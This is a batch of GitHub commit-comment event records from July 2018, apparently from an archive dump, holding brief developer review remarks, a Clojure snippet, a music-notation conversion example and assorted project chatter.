{"id":"7971546403","type":"CommitCommentEvent","actor":{"login":"shanegramlich"},"repo":{"name":"stinb/gitahead-test"},"payload":{"comment":{"id":29722669,"position":1,"line":4,"path":"test","commit_id":"a0bad38889e50aaad137aa0814bc5d66e29aed58","created_at":"2018-07-16T15:50:23Z","updated_at":"2018-07-16T15:50:23Z","author_association":"CONTRIBUTOR","body":"Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Donec quam felis, ultricies nec, pellentesque eu, pretium quis, sem. Nulla consequat massa quis enim. Donec pede justo, fringilla vel, aliquet nec, vulputate eget, arcu. In enim justo, rhoncus ut, imperdiet a, venenatis vitae, justo. Nullam dictum felis eu pede mollis pretium. Integer tincidunt. Cras dapibus. Vivamus elementum semper nisi. Aenean vulputate eleifend tellus. Aenean leo ligula, porttitor eu, consequat vitae, eleifend ac, enim. Aliquam lorem ante, dapibus in, viverra quis, feugiat a, tellus. Phasellus viverra nulla ut metus varius laoreet. Quisque rutrum. Aenean imperdiet. Etiam ultricies nisi vel augue. Curabitur ullamcorper ultricies nisi. Nam eget dui. Etiam rhoncus. Maecenas tempus, tellus eget condimentum rhoncus, sem quam semper libero, sit amet adipiscing sem neque sed ipsum. Nam quam nunc, blandit vel, luctus pulvinar, hendrerit id, lorem. Maecenas nec odio et ante tincidunt tempus. Donec vitae sapien ut libero venenatis faucibus. Nullam quis ante. Etiam sit amet orci eget eros faucibus tincidunt. Duis leo. Sed fringilla mauris sit amet nibh. Donec sodales sagittis magna. Sed consequat, leo eget bibendum sodales, augue velit cursus nunc,"}},"created_at":"2018-07-16T15:50:23Z"}
{"id":"7971547445","type":"CommitCommentEvent","actor":{"login":"stefaweb"},"repo":{"name":"mailwatch/mailwatch-install-script"},"payload":{"comment":{"id":29722671,"position":null,"line":null,"path":null,"commit_id":"e8fd136f0dfe5b7ccd3793810b3a042e0fff1ae7","created_at":"2018-07-16T15:50:33Z","updated_at":"2018-07-16T15:50:33Z","author_association":"NONE","body":"You say that you need InnoDB for Galera. ;)\r\n\r\nI'm going to find out why I've added the item `lastupdate`  in the past.\r\n"}},"created_at":"2018-07-16T15:50:33Z"}
{"id":"7971549927","type":"CommitCommentEvent","actor":{"login":"jirutka"},"repo":{"name":"alpinelinux/aports"},"payload":{"comment":{"id":29722676,"position":null,"line":null,"path":null,"commit_id":"b8d6bb0171bcb609a8d839be9ca8cc24c65726c8","created_at":"2018-07-16T15:50:56Z","updated_at":"2018-07-16T15:50:56Z","author_association":"MEMBER","body":"Why the heck should I want to harass you?! You consider all (legitimate) criticism as a harassment?\r\n\r\nSince git is quite explicit about making merge commits (opens editor with text \"Merge branch...\"), I quite can't imagine how this can happen by mistake. But okay."}},"created_at":"2018-07-16T15:50:56Z"}
{"id":"7971550451","type":"CommitCommentEvent","actor":{"login":"mikhail-m1"},"repo":{"name":"mikhail-m1/rust"},"payload":{"comment":{"id":29722677,"position":16,"line":505,"path":"src/librustc_mir/borrow_check/nll/universal_regions.rs","commit_id":"f391ec585622673bddd5d0d30a0831910c7844dc","created_at":"2018-07-16T15:51:00Z","updated_at":"2018-07-16T15:51:00Z","author_association":"OWNER","body":"I don't think it's a right way, but only one that I found."}},"created_at":"2018-07-16T15:51:00Z"}
{"id":"7971550701","type":"CommitCommentEvent","actor":{"login":"jaymoulin"},"repo":{"name":"darrenloasby/docker-rpi-plex-video-converter"},"payload":{"comment":{"id":29722678,"position":null,"line":null,"path":null,"commit_id":"510c51f4e925f379f3de255db061a18610dc9c83","created_at":"2018-07-16T15:51:03Z","updated_at":"2018-07-16T15:51:03Z","author_association":"NONE","body":"Are you sure this is necessary? I don't have any issue with mkv files"}},"created_at":"2018-07-16T15:51:03Z"}
{"id":"7971550709","type":"CommitCommentEvent","actor":{"login":"alexellis"},"repo":{"name":"ivanayov/faas"},"payload":{"comment":{"id":29722679,"position":23,"line":128,"path":"gateway/server.go","commit_id":"bbc777a59305333947d4ab9afbae393899496d98","created_at":"2018-07-16T15:51:03Z","updated_at":"2018-07-16T15:51:03Z","author_association":"NONE","body":"Not sure this is right.. where is the code that runs if scaling is false?"}},"created_at":"2018-07-16T15:51:03Z"}
{"id":"7971563327","type":"CommitCommentEvent","actor":{"login":"ncopa"},"repo":{"name":"alpinelinux/aports"},"payload":{"comment":{"id":29722690,"position":19,"line":19,"path":"testing/aports-ghpr/APKBUILD","commit_id":"d102e6e0f490f27a3d320f62f1d04e84b5facbc0","created_at":"2018-07-16T15:53:01Z","updated_at":"2018-07-16T15:53:01Z","author_association":"CONTRIBUTOR","body":"> Have you looked into the Alpine Linux Wiki, page APKBUILD_examples:Go?\r\n\r\nNo, I didn't find it. Thanks for pointing me there."}},"created_at":"2018-07-16T15:53:01Z"}
{"id":"7971567470","type":"CommitCommentEvent","actor":{"login":"DamianCwykiel"},"repo":{"name":"DamianCwykiel/Portfolio"},"payload":{"comment":{"id":29722699,"position":null,"line":null,"path":null,"commit_id":"d80929f5d42b9951b6d25a8b1ebe1cdbdc0cedc7","created_at":"2018-07-16T15:53:40Z","updated_at":"2018-07-16T15:53:40Z","author_association":"OWNER","body":"overflow: hidden"}},"created_at":"2018-07-16T15:53:40Z"}
{"id":"7971573117","type":"CommitCommentEvent","actor":{"login":"esoergel"},"repo":{"name":"dimagi/commcare-hq"},"payload":{"comment":{"id":29722708,"position":12,"line":720,"path":"corehq/apps/locations/tests/test_bulk_management.py","commit_id":"8c2d3c168055b30bc73f8f622bbad2ce519be203","created_at":"2018-07-16T15:54:30Z","updated_at":"2018-07-16T15:54:30Z","author_association":"CONTRIBUTOR","body":"You're probably right - this is worth exploring.  I probably won't get to it anytime soon, though."}},"created_at":"2018-07-16T15:54:30Z"}
{"id":"7971574359","type":"CommitCommentEvent","actor":{"login":"mikhail-m1"},"repo":{"name":"mikhail-m1/rust"},"payload":{"comment":{"id":29722710,"position":12,"line":501,"path":"src/librustc_mir/borrow_check/nll/universal_regions.rs","commit_id":"f391ec585622673bddd5d0d30a0831910c7844dc","created_at":"2018-07-16T15:54:42Z","updated_at":"2018-07-16T15:54:42Z","author_association":"OWNER","body":"kludge, just to check idea"}},"created_at":"2018-07-16T15:54:42Z"}
{"id":"7971574670","type":"CommitCommentEvent","actor":{"login":"craigsapp"},"repo":{"name":"rism-ch/verovio"},"payload":{"comment":{"id":29722712,"position":null,"line":null,"path":null,"commit_id":"78bc383fdd70f4dfaab4ee979dc28f06ece97dfe","created_at":"2018-07-16T15:54:45Z","updated_at":"2018-07-16T15:54:45Z","author_association":"CONTRIBUTOR","body":"Allow cancellation key signatures in the Humdrum-to-MEI converter.  Cancellation key sigantures are turned on by adding `*kcancel` to any `**kern` spine (might be implemented by individual staves in the future).  To turn off cancellation key signatures (go back to the default display method), add `*Xkcancel` before the next key signature change.\r\n\r\nExample:\r\n\r\n```\r\n**kern\r\n*k[f#c#g#d#]\r\n*kcancel\r\n1c#\r\n=\r\n*k[b-]\r\n1c\r\n*-\r\n```\r\n\r\nRenders as:\r\n\r\n<img width=\"703\" alt=\"screen shot 2018-07-16 at 5 51 28 pm\" src=\"https://user-images.githubusercontent.com/3487289/42768825-c907a1ae-8920-11e8-936a-30540085b22a.png\">\r\n\r\n\r\nMEI conversion:\r\n\r\n```xml\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<?xml-model href=\"http://music-encoding.org/schema/4.0.0/mei-all.rng\" type=\"application/xml\" schematypens=\"http://relaxng.org/ns/structure/1.0\"?>\r\n<?xml-model href=\"http://music-encoding.org/schema/4.0.0/mei-all.rng\" type=\"application/xml\" schematypens=\"http://purl.oclc.org/dsdl/schematron\"?>\r\n<mei xmlns=\"http://www.music-encoding.org/ns/mei\" meiversion=\"4.0.0\">\r\n    <meiHead>\r\n        <fileDesc>\r\n            <titleStmt>\r\n                <title />\r\n            </titleStmt>\r\n            <pubStmt />\r\n        </fileDesc>\r\n        <encodingDesc>\r\n            <appInfo>\r\n                <application isodate=\"2018-07-16T17:51:53\" version=\"2.0.0-dev-186ffb4-dirty\">\r\n                    <name>Verovio</name>\r\n                    <p>Transcoded from Humdrum</p>\r\n                </application>\r\n            </appInfo>\r\n        </encodingDesc>\r\n        <workDesc>\r\n            <work>\r\n                <titleStmt>\r\n                    <title />\r\n                </titleStmt>\r\n            </work>\r\n        </workDesc>\r\n    </meiHead>\r\n    <music>\r\n        <body>\r\n            <mdiv xml:id=\"mdiv-0000000570500477\">\r\n                <score xml:id=\"score-0000002034516731\">\r\n                    <scoreDef xml:id=\"scoredef-0000000068775909\" midi.bpm=\"400\">\r\n                        <staffGrp xml:id=\"staffgrp-0000002110447119\">\r\n                            <staffDef xml:id=\"staffdef-0000001580559009\" clef.shape=\"G\" clef.line=\"2\" key.sig=\"4s\" n=\"1\" lines=\"5\">\r\n                                <label xml:id=\"label-0000001700476138\" />\r\n                            </staffDef>\r\n                        </staffGrp>\r\n                    </scoreDef>\r\n                    <section xml:id=\"section-L1F1\">\r\n                        <measure xml:id=\"measure-L1\" n=\"0\">\r\n                            <staff xml:id=\"staff-0000000833409308\" n=\"1\">\r\n                                <layer xml:id=\"layer-L1F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L4F1\" dur=\"1\" oct=\"4\" pname=\"c\" accid.ges=\"s\" />\r\n                                </layer>\r\n                            </staff>\r\n                        </measure>\r\n                        <scoreDef xml:id=\"scoredef-0000000129773681\" key.sig=\"1f\" keysig.showchange=\"true\" />\r\n                        <measure xml:id=\"measure-L5\" right=\"invis\">\r\n                            <staff xml:id=\"staff-L5F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L5F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L7F1\" dur=\"1\" oct=\"4\" pname=\"c\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                        </measure>\r\n                    </section>\r\n                </score>\r\n            </mdiv>\r\n        </body>\r\n    </music>\r\n</mei>\r\n```\r\n\r\nWithout `*kcancel` the default behaivor of the Humdrum-to-MEI converter will not display cancellation key signatures (other than when changing to C major/A minor):\r\n\r\n```\r\n**kern\r\n*k[f#c#g#d#]\r\n1c#\r\n=\r\n*k[b-]\r\n1c\r\n*-\r\n```\r\n\r\nRenders as:\r\n\r\n<img width=\"626\" alt=\"screen shot 2018-07-16 at 5 53 13 pm\" src=\"https://user-images.githubusercontent.com/3487289/42768915-07af95e2-8921-11e8-8bb0-258a99b271c0.png\">\r\n\r\nMEI conversion:\r\n\r\n```xml\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<?xml-model href=\"http://music-encoding.org/schema/4.0.0/mei-all.rng\" type=\"application/xml\" schematypens=\"http://relaxng.org/ns/structure/1.0\"?>\r\n<?xml-model href=\"http://music-encoding.org/schema/4.0.0/mei-all.rng\" type=\"application/xml\" schematypens=\"http://purl.oclc.org/dsdl/schematron\"?>\r\n<mei xmlns=\"http://www.music-encoding.org/ns/mei\" meiversion=\"4.0.0\">\r\n    <meiHead>\r\n        <fileDesc>\r\n            <titleStmt>\r\n                <title />\r\n            </titleStmt>\r\n            <pubStmt />\r\n        </fileDesc>\r\n        <encodingDesc>\r\n            <appInfo>\r\n                <application isodate=\"2018-07-16T17:53:34\" version=\"2.0.0-dev-186ffb4-dirty\">\r\n                    <name>Verovio</name>\r\n                    <p>Transcoded from Humdrum</p>\r\n                </application>\r\n            </appInfo>\r\n        </encodingDesc>\r\n        <workDesc>\r\n            <work>\r\n                <titleStmt>\r\n                    <title />\r\n                </titleStmt>\r\n            </work>\r\n        </workDesc>\r\n    </meiHead>\r\n    <music>\r\n        <body>\r\n            <mdiv xml:id=\"mdiv-0000000161385469\">\r\n                <score xml:id=\"score-0000000133731322\">\r\n                    <scoreDef xml:id=\"scoredef-0000000763837605\" midi.bpm=\"400\">\r\n                        <staffGrp xml:id=\"staffgrp-0000000821151924\">\r\n                            <staffDef xml:id=\"staffdef-0000000647126044\" clef.shape=\"G\" clef.line=\"2\" key.sig=\"4s\" n=\"1\" lines=\"5\">\r\n                                <label xml:id=\"label-0000001544783482\" />\r\n                            </staffDef>\r\n                        </staffGrp>\r\n                    </scoreDef>\r\n                    <section xml:id=\"section-L1F1\">\r\n                        <measure xml:id=\"measure-L1\" n=\"0\">\r\n                            <staff xml:id=\"staff-0000001827384873\" n=\"1\">\r\n                                <layer xml:id=\"layer-L1F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L3F1\" dur=\"1\" oct=\"4\" pname=\"c\" accid.ges=\"s\" />\r\n                                </layer>\r\n                            </staff>\r\n                        </measure>\r\n                        <scoreDef xml:id=\"scoredef-0000000163993923\" key.sig=\"1f\" />\r\n                        <measure xml:id=\"measure-L4\" right=\"invis\">\r\n                            <staff xml:id=\"staff-L4F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L4F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L6F1\" dur=\"1\" oct=\"4\" pname=\"c\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                        </measure>\r\n                    </section>\r\n                </score>\r\n            </mdiv>\r\n        </body>\r\n    </music>\r\n</mei>\r\n```"}},"created_at":"2018-07-16T15:54:45Z"}
{"id":"7971575876","type":"CommitCommentEvent","actor":{"login":"mikhail-m1"},"repo":{"name":"mikhail-m1/rust"},"payload":{"comment":{"id":29722714,"position":null,"line":null,"path":null,"commit_id":"f391ec585622673bddd5d0d30a0831910c7844dc","created_at":"2018-07-16T15:54:55Z","updated_at":"2018-07-16T15:54:55Z","author_association":"OWNER","body":"it brakes  src/test/ui/nll/ty-outlives/projection-two-region-trait-bound-closure.rs, because stderror contains region numbers, but I don't understand why new regions are added, need some time to debug it."}},"created_at":"2018-07-16T15:54:55Z"}
{"id":"7971577782","type":"CommitCommentEvent","actor":{"login":"miguelvr"},"repo":{"name":"mallidi/espnet"},"payload":{"comment":{"id":29722716,"position":122,"line":2163,"path":"src/nets/e2e_asr_attctc_th.py","commit_id":"2fdd869a1a9a91c1a3124b35e59de4516eb6973a","created_at":"2018-07-16T15:55:12Z","updated_at":"2018-07-16T15:55:12Z","author_association":"NONE","body":"I would call it \"cell_type\" to keep it generic... because the class is not tied to an encoder"}},"created_at":"2018-07-16T15:55:12Z"}
{"id":"7971579151","type":"CommitCommentEvent","actor":{"login":"sunke5616"},"repo":{"name":"akachronix/pubg-lagswitch"},"payload":{"comment":{"id":29722717,"position":null,"line":null,"path":null,"commit_id":"47f04db0b38b38fdd790b8dbe43a3b44b9fc98ff","created_at":"2018-07-16T15:55:24Z","updated_at":"2018-07-16T15:55:24Z","author_association":"NONE","body":"Turning lagswitch on.\r\nNew-NetQosPolicy : 无法从客户端中访问 CIM 资源。\r\n所在位置 行:1 字符: 1\r\n+ New-NetQosPolicy -Name CHANGEME -AppPathNameMatchCondition TSLGame.ex ...\r\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n    + CategoryInfo          : PermissionDenied: (MSFT_NetQosPolicySettingData:ROOT/StandardCi...licySettingData) [New-\r\n   NetQosPolicy], CimException\r\n    + FullyQualifiedErrorId : MI RESULT 2,New-NetQosPolicy\r\n"}},"created_at":"2018-07-16T15:55:24Z"}
{"id":"7971579787","type":"CommitCommentEvent","actor":{"login":"aledjones"},"repo":{"name":"aledjones/db-rest"},"payload":{"comment":{"id":29722720,"position":17,"line":32,"path":"readme.md","commit_id":"5d445e9a4e96c8773a83ce3e5e2feb3be580fee9","created_at":"2018-07-16T15:55:29Z","updated_at":"2018-07-16T15:55:29Z","author_association":"OWNER","body":"I integrated directly with Docker Hub’s Automatic repo build which connects Docker Hub with the GitHub account directly (ergo you would have to set up the connection yourself). Wasn’t really sure you would agree or that you have plans for that anyway. I’m happy to assist you with the CI :)\n(Besides: the branch architecture gives me the freedom to setup different tags to meet my needs)\n\n> Am 16.07.2018 um 17:47 schrieb Jannis Redmann <notifications@github.com <mailto:notifications@github.com>>:\n> \n> Why not do this in the upstream repo? Would happily let a CI service build Docker images!\n> \n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub <https://github.com/aledjones/db-rest/commit/5d445e9a4e96c8773a83ce3e5e2feb3be580fee9#commitcomment-29722634>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AAnnts2cUw3F0KKJ0rC-00ngtN1YzEa-ks5uHLWDgaJpZM4VRXmU>.\n> \n\n"}},"created_at":"2018-07-16T15:55:29Z"}
{"id":"7971585966","type":"CommitCommentEvent","actor":{"login":"nicktimko"},"repo":{"name":"PyCQA/pylint"},"payload":{"comment":{"id":29722727,"position":null,"line":null,"path":null,"commit_id":"3a8635a9ef85759f96bfefd8edcd70e223fd12bb","created_at":"2018-07-16T15:56:23Z","updated_at":"2018-07-16T15:56:23Z","author_association":"NONE","body":"Meh, sounds like a can-of-worms. Not brave enough to touch that `:P`"}},"created_at":"2018-07-16T15:56:23Z"}
{"id":"7971587935","type":"CommitCommentEvent","actor":{"login":"shuayb"},"repo":{"name":"toolboc/faithcoin"},"payload":{"comment":{"id":29722728,"position":null,"line":null,"path":null,"commit_id":"f1cb4e47afe9d2006e9d6cd2be878b9b6d1de86b","created_at":"2018-07-16T15:56:41Z","updated_at":"2018-07-16T15:56:41Z","author_association":"NONE","body":"Issues are not enabled I believe, so I am posting here.\r\n\r\nCan you please guide me about insight block explorer? How can I configure it for a custom coin like faithcoin? I am working on my uni project (github.com/shuayb/qudscoin) actually.\r\n\r\nAny appropriate settings, reading materials, etc is highly appreciated. Thank you."}},"created_at":"2018-07-16T15:56:41Z"}
{"id":"7971593250","type":"CommitCommentEvent","actor":{"login":"derhuerst"},"repo":{"name":"aledjones/db-rest"},"payload":{"comment":{"id":29722739,"position":17,"line":32,"path":"readme.md","commit_id":"5d445e9a4e96c8773a83ce3e5e2feb3be580fee9","created_at":"2018-07-16T15:57:33Z","updated_at":"2018-07-16T15:57:33Z","author_association":"NONE","body":"I'm willing to provide basic Docker support and will look into the Docker Hub integration later.\r\n\r\nNot sure about the custom tags. What do you have in mind?"}},"created_at":"2018-07-16T15:57:33Z"}
{"id":"7971596172","type":"CommitCommentEvent","actor":{"login":"Worthstream"},"repo":{"name":"CleverRaven/Cataclysm-DDA"},"payload":{"comment":{"id":29722749,"position":3668,"line":4134,"path":"src/mission_companion.cpp","commit_id":"9752dd74f0001724a849b47d97ab52409d307cd7","created_at":"2018-07-16T15:58:03Z","updated_at":"2018-07-16T15:58:03Z","author_association":"NONE","body":"Looks like cutting is being counted twice here."}},"created_at":"2018-07-16T15:58:03Z"}
{"id":"7971600168","type":"CommitCommentEvent","actor":{"login":"mesteves-mw"},"repo":{"name":"JeremySkinner/FluentValidation"},"payload":{"comment":{"id":29722772,"position":6,"line":64,"path":"src/FluentValidation/ValidationException.cs","commit_id":"f34a51e4f744ba2ff40ab12a892f24476bc3733b","created_at":"2018-07-16T15:58:43Z","updated_at":"2018-07-16T15:58:43Z","author_association":"NONE","body":"Sorry @JeremySkinner I mistakenly assumed I was looking at the full change here."}},"created_at":"2018-07-16T15:58:43Z"}
{"id":"7971600987","type":"CommitCommentEvent","actor":{"login":"xingrz"},"repo":{"name":"SuperDroidBond/device_oneplus3"},"payload":{"comment":{"id":29722774,"position":121,"line":81,"path":"OneplusShit/AndroidManifest.xml","commit_id":"879810ebe3a9e18d82e3171ad65a035300bdafb6","created_at":"2018-07-16T15:58:51Z","updated_at":"2018-07-16T15:58:51Z","author_association":"NONE","body":"the action should be `android.intent.action.BOOT_COMPLETED`"}},"created_at":"2018-07-16T15:58:51Z"}
{"id":"7971604403","type":"CommitCommentEvent","actor":{"login":"tommerbomb"},"repo":{"name":"tommerbomb/funcadelic.js"},"payload":{"comment":{"id":29722783,"position":null,"line":null,"path":null,"commit_id":"cb3aeda9780bc78cff889e62ab9ac332cc9df036","created_at":"2018-07-16T15:59:23Z","updated_at":"2018-07-16T15:59:23Z","author_association":"OWNER","body":"fix typo"}},"created_at":"2018-07-16T15:59:23Z"}
{"id":"7971604832","type":"CommitCommentEvent","actor":{"login":"FokinAlex"},"repo":{"name":"FokinAlex/SpringSimpleApp"},"payload":{"comment":{"id":29722786,"position":55,"line":55,"path":"src/main/resources/schema.sql","commit_id":"b327a84ee45bf46e25ec8cf7673f1756176c6e45","created_at":"2018-07-16T15:59:28Z","updated_at":"2018-07-16T15:59:28Z","author_association":"OWNER","body":"Yiss, it's the easy way to see what and where i 've got  \r\nIt's just a 100 simple format lines which can be automatically taken when the application launch "}},"created_at":"2018-07-16T15:59:28Z"}
{"id":"7971605863","type":"CommitCommentEvent","actor":{"login":"xingrz"},"repo":{"name":"SuperDroidBond/device_oneplus3"},"payload":{"comment":{"id":29722789,"position":28,"line":28,"path":"OneplusShit/src/com/oneplus/shit/settings/Startup.java","commit_id":"879810ebe3a9e18d82e3171ad65a035300bdafb6","created_at":"2018-07-16T15:59:38Z","updated_at":"2018-07-16T15:59:38Z","author_association":"NONE","body":"the action should be `android.intent.action.BOOT_COMPLETED`, or just remove this if {}"}},"created_at":"2018-07-16T15:59:38Z"}
{"id":"7971611523","type":"CommitCommentEvent","actor":{"login":"ysangkok"},"repo":{"name":"cdecker/lightning-integration"},"payload":{"comment":{"id":29722804,"position":3,"line":11,"path":"requirements.txt","commit_id":"16a62d0f13bbec1c794d8d01e892887657a16552","created_at":"2018-07-16T16:00:30Z","updated_at":"2018-07-16T16:00:30Z","author_association":"CONTRIBUTOR","body":"You didn't actually remove the dependency."}},"created_at":"2018-07-16T16:00:30Z"}
{"id":"7971613854","type":"CommitCommentEvent","actor":{"login":"Alej0hio"},"repo":{"name":"OpenShopChannel/Open-Shop-SOAP"},"payload":{"comment":{"id":29722805,"position":null,"line":null,"path":null,"commit_id":"1ee66f1aee5e90a92244b0d9e6cb216fec0c8c95","created_at":"2018-07-16T16:00:52Z","updated_at":"2018-07-16T16:00:52Z","author_association":"NONE","body":"<Currency>POINTS!Yay, not actual currency! you dont know how much it actually costs!</Currency>"}},"created_at":"2018-07-16T16:00:52Z"}
{"id":"7971614358","type":"CommitCommentEvent","actor":{"login":"mojca"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29722806,"position":null,"line":null,"path":null,"commit_id":"a4e16dbb046d89f9146dbc9408f2bfb96ec73a82","created_at":"2018-07-16T16:00:57Z","updated_at":"2018-07-16T16:00:57Z","author_association":"MEMBER","body":"Btw: such comments will go unnoticed by everyone other than the committer and maybe a geek every now and then. Regarding the question though: please complain at Apple and/or developers of software in question. It has never been and never will be the duty of volunteers packaging software to fix every bug in every software package one can find in the wild."}},"created_at":"2018-07-16T16:00:57Z"}
{"id":"7971616463","type":"CommitCommentEvent","actor":{"login":"jnosornov"},"repo":{"name":"jnosornov/sillyTodoAPI"},"payload":{"comment":{"id":29722811,"position":null,"line":null,"path":null,"commit_id":"04eca40ecedb350308a5c28033cad1eb3f5e304e","created_at":"2018-07-16T16:01:19Z","updated_at":"2018-07-16T16:01:19Z","author_association":"OWNER","body":"Not using a schema right here. Need to understand its purpose."}},"created_at":"2018-07-16T16:01:19Z"}
{"id":"7971616704","type":"CommitCommentEvent","actor":{"login":"abompard"},"repo":{"name":"jeremycline/fedora-messaging"},"payload":{"comment":{"id":29722812,"position":null,"line":null,"path":null,"commit_id":"e57cde8412fd99c5d62579dc959cd01edbfaafd4","created_at":"2018-07-16T16:01:21Z","updated_at":"2018-07-16T16:01:21Z","author_association":"NONE","body":"I saw that but I don't see this commit there."}},"created_at":"2018-07-16T16:01:21Z"}
{"id":"7971618403","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29722814,"position":null,"line":null,"path":null,"commit_id":"bdd95a8c3ba24fc71c74fc27a84ac7b2bc599ffc","created_at":"2018-07-16T16:01:39Z","updated_at":"2018-07-16T16:01:39Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#pr-48](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#pr-48).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-48-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-16T16:01:39Z"}
{"id":"7971619185","type":"CommitCommentEvent","actor":{"login":"zaufi"},"repo":{"name":"MageSlayer/paludis-gentoo-patches"},"payload":{"comment":{"id":29722815,"position":5,"line":323,"path":"CMakeLists.txt","commit_id":"0902becf070f15dfb98af8729182da989754704d","created_at":"2018-07-16T16:01:46Z","updated_at":"2018-07-16T16:01:46Z","author_association":"CONTRIBUTOR","body":"Just checked `paludis` sources: it uses \"old\" and deprecated approach to\nlink against boost, so it (probably) would work...\nCMake < 3.12 do not have support for imported targets for boost >= 1.65.1.\n\n(I don't recall exactly since what boost version they had changed the\nboost::python library naming... it could be 1.67... -- but it seems for\nGentoo it'll happen in a few years %) -- because `boost` packages getting\nrolled out w/ increasing delays between versions in this distro %) ... 2\nversions of boost could out before version bump happened in Gentoo %)\n\nOn Mon, Jul 16, 2018 at 6:42 PM, Denis Golovan <notifications@github.com>\nwrote:\n\n> Are you sure that current cmake will stop working with boost-1.66 and\n> cmake-3.12?\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/MageSlayer/paludis-gentoo-patches/commit/0902becf070f15dfb98af8729182da989754704d#commitcomment-29722584>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAhfa5oMyJQPY4I8wYkR6WJbKRRHCd6Nks5uHLRvgaJpZM4VRK6o>\n> .\n>\n"}},"created_at":"2018-07-16T16:01:46Z"}
{"id":"7971619315","type":"CommitCommentEvent","actor":{"login":"fs-tom"},"repo":{"name":"fsdonks/demand_builder"},"payload":{"comment":{"id":29722818,"position":null,"line":null,"path":null,"commit_id":"510bb447eabb60a36d0494963c2860c0707c7c5c","created_at":"2018-07-16T16:01:48Z","updated_at":"2018-07-16T16:01:48Z","author_association":"MEMBER","body":"@mpavlak1  @fs-craig \r\nIf all you need are the headers, ala the use-case you describe, \r\nyou can get the first row without monkey patching....\r\nUse the core functions from docjure (for now, can be elevated into\r\nspork.util.excel.core API in future if needed....)\r\n\r\n(require '[spork.util.excel.docjure :as doc])\r\n(require '[spork.util.excel.core :as xl])\r\n(defn sheet-rows [p & {:keys [sheets]}]\r\n  (let [wb (xl/xlsx->wb p)]\r\n    (->> (for [s  (doc/sheet-seq wb)\r\n               :when (sheets (doc/sheet-name s))]\r\n           [(doc/sheet-name s) s])\r\n         (into {}))))\r\n\r\n(defn nth-row [xlsx sheet-name n]\r\n  (-> xlsx\r\n      (sheet-rows :sheets #{sheet-name})\r\n      (get sheet-name)\r\n      xl/contiguous-rows\r\n      (nth n)\r\n      xl/row->vec))\r\n\r\n(comment\r\n  (def p \"~demand_builder/test/working-example/Scenario ABC TAA.xlsx\")\r\n  (nth-row p \"Unit_Node_Detail\" 0)\r\n  ;; [\"UIN Quantity\" \"Time Period Begin Day\" \"Time Period\r\n  ;;  Days\" \"Subphase\" \"SRC\r\n  ;;  Strength\" \"SRC\" \"Title\" \"extrarow\" \"notused\" \"otherdata\"]\r\n  )\r\n"}},"created_at":"2018-07-16T16:01:48Z"}
{"id":"7971622035","type":"CommitCommentEvent","actor":{"login":"ferd"},"repo":{"name":"erlware/relx"},"payload":{"comment":{"id":29722825,"position":null,"line":null,"path":null,"commit_id":"78561dc7a812466aa1e8c9f36a6b48c7f7cc4195","created_at":"2018-07-16T16:02:15Z","updated_at":"2018-07-16T16:02:15Z","author_association":"CONTRIBUTOR","body":"yeah I tripped on it at some point in the past while prepping for OTP-21. My guess is that this is just the new default to avoid loading the .erlang config files by default for plenty of tools and the problem happened whenever the VM expected it by default but wouldn't find them.\r\n\r\nI never could find a practical difference between the generated files though, so I figure something else was afoot but found no docs about it. This seemed to fix everything."}},"created_at":"2018-07-16T16:02:15Z"}
{"id":"7971622268","type":"CommitCommentEvent","actor":{"login":"caution3"},"repo":{"name":"OpenShopChannel/Open-Shop-SOAP"},"payload":{"comment":{"id":29722826,"position":null,"line":null,"path":null,"commit_id":"1ee66f1aee5e90a92244b0d9e6cb216fec0c8c95","created_at":"2018-07-16T16:02:17Z","updated_at":"2018-07-16T16:02:17Z","author_association":"MEMBER","body":"🤔 "}},"created_at":"2018-07-16T16:02:17Z"}
{"id":"7971623702","type":"CommitCommentEvent","actor":{"login":"dhtdht020"},"repo":{"name":"OpenShopChannel/Open-Shop-SOAP"},"payload":{"comment":{"id":29722829,"position":null,"line":null,"path":null,"commit_id":"1ee66f1aee5e90a92244b0d9e6cb216fec0c8c95","created_at":"2018-07-16T16:02:32Z","updated_at":"2018-07-16T16:02:32Z","author_association":"CONTRIBUTOR","body":":thinking:"}},"created_at":"2018-07-16T16:02:32Z"}
{"id":"7971629621","type":"CommitCommentEvent","actor":{"login":"jonathanfrancisco"},"repo":{"name":"jonathanfrancisco/Dental-Records-Management-System"},"payload":{"comment":{"id":29722836,"position":null,"line":null,"path":null,"commit_id":"3492e54c3d6c62c7da8993455e1b48719a6b1eae","created_at":"2018-07-16T16:03:34Z","updated_at":"2018-07-16T16:03:34Z","author_association":"OWNER","body":"Actual date commited July 16, 2018. Accidentally changed my pc's date when I commited it."}},"created_at":"2018-07-16T16:03:34Z"}
